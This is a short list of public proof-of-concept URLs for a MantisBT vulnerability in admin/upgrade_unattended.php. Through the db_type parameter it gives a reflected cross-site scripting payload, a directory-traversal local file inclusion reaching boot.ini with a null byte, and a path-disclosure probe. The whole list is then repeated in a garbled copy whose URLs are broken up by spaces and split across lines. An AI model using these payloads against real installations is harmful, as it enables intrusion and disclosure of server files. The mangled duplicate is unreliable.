Public PoCs (from http://www.mantisbt.org/bugs/view.php?id=12607):
1), cross-site scripting (XSS): http://[mantis_root_host]/admin/upgrade_unattended.php?db_type=%3Cscript%3Ealert%281%29%3C/script%3E
2), local file inclusion (LFI): http://[mantis_root_host]/admin/upgrade_unattended.php?db_type=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fboot.ini%00
3), path disclosure (PD): http://[mantis_root_host]/admin/upgrade_unattended.php?db_type=%27
Public PoCs (from http:// www.mantisbt. org/bugs/ view.php? id=12607):
1), cross-site scripting (XSS): root_host] /admin/ upgrade_ unattended. php?db_ type=%3Cscript% 3Ealert% 281%29% 3C/script% 3E
http://[mantis_
2), local file inclusion (LFI): root_host] /admin/ upgrade_ unattended. php?db_ type=.. %2f..%2f. .%2f..% 2f..%2f. .%2f..% 2f..%2fboot. ini%00
http://[mantis_
3), path disclosure (PD): root_host] /admin/ upgrade_ unattended. php?db_ type=%27
http://[mantis_